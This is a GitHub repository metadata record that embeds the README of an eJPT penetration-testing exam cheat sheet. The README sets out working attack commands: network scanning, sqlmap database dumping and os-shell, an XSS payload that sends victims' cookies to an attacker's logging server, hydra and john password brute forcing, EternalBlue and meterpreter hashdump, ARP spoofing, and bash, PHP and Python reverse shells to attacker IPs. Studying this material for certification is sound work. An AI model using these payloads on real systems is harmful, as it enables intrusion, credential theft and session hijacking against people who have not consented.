{"id":19237224,"url":"https://github.com/cocomelonc/ejpt","last_synced_at":"2025-10-16T00:41:00.407Z","repository":{"id":44324780,"uuid":"351676023","full_name":"cocomelonc/ejpt","owner":"cocomelonc","description":"some eJPT exam preparation notes","archived":false,"fork":false,"pushed_at":"2021-04-29T06:36:26.000Z","size":11,"stargazers_count":71,"open_issues_count":1,"forks_count":20,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-04-01T10:36:11.958Z","etag":null,"topics":["ejpt","ethicalhacking","hacking","pentest","pentesting"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cocomelonc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-03-26T05:48:01.000Z","updated_at":"2025-03-26T16:59:16.000Z","dependencies_parsed_at":"2022-09-05T17:20:22.379Z","dependency_job_id":null,"html_url":"https://github.com/cocomelonc/ejpt","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cocomelonc","download_url":"https://codeload.github.com/cocomelonc/ejpt/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250002326,"owners_count":21359095,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ejpt","ethicalhacking","hacking","pentest","pentesting"],"created_at":"2024-11-09T16:25:30.479Z","updated_at":"2025-10-16T00:40:55.375Z","avatar_url":"https://github.com/cocomelonc.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# eJPT\nsome eLearnSecurity eJPT exam preparation materials\n\n### nmap + fping\nhosts discovery fping:\n```bash\nfping -a -g 10.10.10.0/24 2\u003e fping.txt\n```\n\nhosts discovery nmap:\n```bash\nnmap -sn 10.10.10.0/24 \u003e hosts.txt\nnmap -sn -T4 10.10.30.0/24 -oG - | awk '/Up$/{print $2}'\n```\n\nopen ports scan (save to file):\n```bash\nnmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open\n```\n\nUDP port scan:\n```bash\nnmap -sU -sV 10.10.10.0/24\n```\n\nnmap vuln scan example:\n```bash\nnmap --script vuln --script-args=unsafe=1 -iL hosts.txt\n```\n\nnmap SYN flood example:\n```bash\nwatch -n 10 \"nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251\"\n```\n\n### masscan\n\nmasscan open only examples:\n```bash\nsudo masscan -p 21,22,80,8080,445,9200 --rate 64000 --wait 0 --open-only -oG masscan.gnmap 10.0.0.0/24\nsudo masscan -iL hosts.list -p0-65535 --rate 64000 --open-only\n```\n\n### httprint\n\nhttprint banner grabling:\n```bash\nhttprint -P0 -s /usr/share/httprint/signatures.txt -h 10.10.10.15\n```\n\n### route\n\nadd a route in kali/parrot:\n```bash\nip route add 192.168.88.0/24 via 10.10.34.1\n```\n\nrouting table:\n```bash\nnetstat -rn\nKernel IP routing table\nDestination      Gateway        Genmask         Flags   MSS Window  irtt Iface\n...\n192.168.88.0     10.10.34.1     255.255.255.0   UG        0 0          0 tap0\n...\n```\n\n### subdomains\ndiscovery subdomain of a target by sublist3r:\n```bash\nsublist3r -d company.com\n```\n\n## wireshark\nfilter by ip\n```bash\nip.add == 10.10.10.9\n```\n\nfilter by dest ip\n```bash\nip.dest == 10.10.10.15\n```\n\nfilter by source ip\n```bash\nip.src == 10.10.16.33\n```\n\nfilter by tcp port\n```bash\ntcp.port == 25\n```\n\nfilter by ip addr and port\n```bash\nip.addr == 10.10.14.22 and tcp.port == 8080\n```\n\nfilter SYN flag\n```bash\ntcp.flags.syn == 1 and tcp.flags.ack ==0\n```\n\nbroadcast filter\n```bash\neth.dst == ff:ff:ff:ff:ff:ff\n```\n\n### web app enum (gobuster)\n```bash\nnc -v 10.10.10.14 80\nHEAD / HTTP/1.0\n\nopenssl s_client -connect 10.10.10.14:443\n\ndirb http://10.10.10.123/\ndirb https://10.10.10.5 /usr/share/dirb/wordlists/vulns/apache.txt\ndirb https://192.168.16.33 /usr/share/dirb/wordlists/common.txt\n\ngobuster dir -u http://10.10.10.160 -w /usr/share/wordlists/dirb/common.txt -t 16\n```\n\n### web app enum (ffuf)\n\ndirectory discovery:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ\n```\n\nfile discovery:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ -e .aspx,.php,.txt,.html\n```\n\noutput of responses with status code:\n```bash\nffuf -w /usr/share/wordlists/dirb/small.txt -u http://example.com/FUZZ -mc 200,301\n```\n\nthe -maxtime flag offers to end the ongoing fuzzing after the specified time in seconds:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ -maxtime 60\n```\n\nnumber of threads:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ -t 64\n```\n\n### sqlmap\n\ndetermine the databases:\n```bash\nsqlmap -u http://10.10.10.15/?id=4 --dbs\n```\n\ndetermine the tables:\n```bash\nsqlmap -u http://10.10.10.15/?id=4 -D dbname --tables\n```\n\ndump a table's data:\n```bash\nsqlmap -u http://10.10.10.15/?id=4 -D dbname -T table --dump\n```\n\ntry to get os-shell:\n```bash\nsqlmap -u http://10.10.10.15/?id=4 --os-shell\n```\n\n### xss\n\ncheck example:\n```javascript\n\u003cscript\u003ealert(\"hack :)\")\u003c/script\u003e\n```\n\n#### hijack cookie through xss\nthere are four components as follows:\n- attacker client pc\n- attacker logging server\n- vulnerable server\n- victim client pc\n\n\n1) attacker: first finds a vulnerable server and its breach point.\n\n2) attacker: enter the following snippet in order to hijack the cookie kepts by victim client pc (p.s.: the ip address, 192.168.99.102, belongs to attacker logging server in this example):\n```javascript\n\u003cscript\u003evar i = new Image();i.src=\"http://192.168.99.102/log.php?q=\"+document.cookie;\u003c/script\u003e\n```\n\n3) attacker: log into attacker logging server (P.S.: it is 192.168.99.102 in this example), and execute the following command:\n```bash\nnc -vv -k -l -p 80\n```\n\n4) attacker: when victim client pc browses the vulnerable server, check the output of the command above.\n\n5) attacker: after obtaining the victim's cookie, utilize a firefox's add-on called Cookie Quick Manager to change to the victim's cookie in an effort to hijack the victim's privilege.\n\n\n### bruteforce (hydra, john, hashcat)\nwordlist generation\n```bash\ncewl example.com -m 3 -w wordlist.txt\n```\n\nhydra http basic auth brute\n```bash\nhydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/\n```\n\nhydra brute http digest\n```bash\nhydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/\n```\n\nhydra brute http post form\n```bash\nhydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form \"/login.php:username=^USER^\u0026password=^PASS^\u0026login=Login:Not allowed\"\n```\n\nhydra brute http authenticated post form\n```bash\nhydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form \"/login.php:username=^USER^\u0026password=^PASS^\u0026login=Login:Not allowed:H=Cookie\\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v\"\n```\n\nhydra brute\n```bash\nhydra -f -v -V -L users.txt -P rockyou-15.txt -s 2223 -f ssh://10.10.10.17\nhydra -v -V -l admin -P rockyou-10.txt ssh://10.10.10.18\n```\n\ncombine passwd with shadow file for john the ripper:\n```bash\nunshadow passwd shadow \u003e crack.hash\n```\n\njohn the ripper bruteforce:\n```bash\njohn -wordlist /usr/share/wordlists/rockyou.txt crack.hash\njohn -wordlist /usr/share/wordlists/rockyou.txt -users users.txt test.hash\n```\n\nhashcat:\n```bash\nhashcat -m 1000 -a 0 -o found.txt --remove crack.hash rockyou-10.txt\n```\n\n### wpscan\n```bash\nwpscan --url http://10.10.10.14 --enumerate u\nwpscan --url example.com -e vp --plugins-detection mixed --api-token API_TOKEN\nwpscan --url example.com -e u --passwords /usr/share/wordlists/rockyou.txt\nwpscan --url example.com -U admin -P /usr/share/wordlists/rockyou.txt\n```\n\n### mysql\nscan:\n```bash\nnmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13\n```\n\nexamples:\n```bash\nmysql -h 10.10.10.23 -P 13306 -u root -p -e \"show databases;\"\nmysql -h 10.10.10.23 -P 13306 -u root -p -e \"use mydb;show tables;\"\nmysql -h 10.10.10.23 -P 13306 -u root -p -e \"use mydb;select * from users;\"\n```\n\n### msfconsole\nsearch exploit\n```bash\nmsf\u003e search cve:2011 port:135 platform:windows target:XP\n```\n\nbasic\n```bash\nmsfconsole\nuse auxiliary/scanner/mssql/mssql_login\nset rhosts 10.10.10.110\nset rports 1433\nset username admin\nset password 12345\nset verbose true\nrun\n```\n### msfconsole examples\nmsssql enum\n```bash\nuse auxiliary/scanner/mssql/mssql_enum\nset username admin\nset password 12345\nset rhosts 10.10.10.177\nset rport 1433\nrun\n```\n\nmssql payload\n```bash\nuse exploit/windows/mssql/mssql_payload\nset rhosts 10.10.10.177\nset rport 1433\nset srvport 53\nset username admin\nset password qwerty\nset payload windows/x64/meterpreter_reverse_tcp\n```\n\nssh login enum (brute)\n```bash\nuse auxiliary/scanner/ssh/ssh_login\nshow options\nset rhosts 10.10.10.133\nset user_file /usr/share/ncrack/minimal.usr\nset pass_file /usr/share/ncrack/minimal.usr\nset verbose true\nrun\n```\n\neternal blue example:\n```bash\nuse exploit/windows/smb/ms17_010_eternalblue\nshow options\nset payload windows/x64/meterpreter/reverse_tcp\n```\n\n### meterpreter\n```bash\nmeterpreter\u003erun autoroute -s 172.16.50.0/24\nbackground\n\nsessions -l\nsessions -i 1\n\nsysinfo, ifconfig, route, getuid\ngetsystem (privesc)\nbypassuac\n\ndownload x /root/\nupload x C:\\\\Windows\nshell\n\nuse post/windows/gather/hashdump\n```\n\n### windows shares with null sessions\n\nenumeration with kali/parrot tools:\n```\nnmblookup -A 10.16.64.223\nsmbclient -L //10.16.64.223 -N share\nsmbclient //10.16.64.223/share -N mount\n\nenum4linux -a 10.10.10.13\n```\n\nenumeration with nmap:\n```bash\nll /usr/share/nmap/scripts/ | grep smb-enum-\n-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse\n-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse\n-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse\n-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse\n-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse\n-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse\n-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse\n\nnmap --script=smb-enum-users 192.168.1.10\n```\n\n#### null sessions\n1) Use \"enum4linux -n\" to make sure if \"\u003c20\u003e\" exists:\n```bash\nenum4linux -n 192.168.1.10\n```\n\n2) If \"\u003c20\u003e\" exists, it means Null Session could be exploited. Utilize the following command to get more details:\n```bash\nenum4linux 192.168.1.10\n```\n\n3) If confirmed that Null Session exists, you can remotely list all share of the target:\n```bash\nsmbclient -L WORKGROUP -I 192.168.1.10 -N -U \"\"\n```\n\n4) You also can connect the remote server by applying the following command:\n```bash\nsmbclient \\\\\\\\192.168.1.10\\\\c$ -N -U \"\"\n```\n\n5) Download those files stored on the share drive:\n```bash\nsmb: \\\u003e get Congratulations.txt\n```\n\n### ARP spoofing\n```bash\necho 1 \u003e /proc/sys/net/ipv4/ip_forward\narpspoof -i tap0 -t 10.13.37.100 -r 10.13.37.101\n```\n\n### reverse shell\nbash\n```bash\nbash -i \u003e\u0026 /dev/tcp/10.0.14.22/4444 0\u003e\u00261\n```\n\nphp one line (bash)\n```php\n\u003c?php exec(\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.0.14.10/4444 0\u003e\u00261'\"); ?\u003e\n```\n\npython\n```python\nimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.14.22\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\n```\n\n## programming examples\nport scanner examples:\n\n[python simple tcp scan example](https://github.com/cocomelonc/ejpt/blob/master/scanner.py)\n\n[golang simple tcp scan example](https://github.com/cocomelonc/ejpt/blob/master/scanner.go)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fejpt","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcocomelonc%2Fejpt","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fejpt/lists"}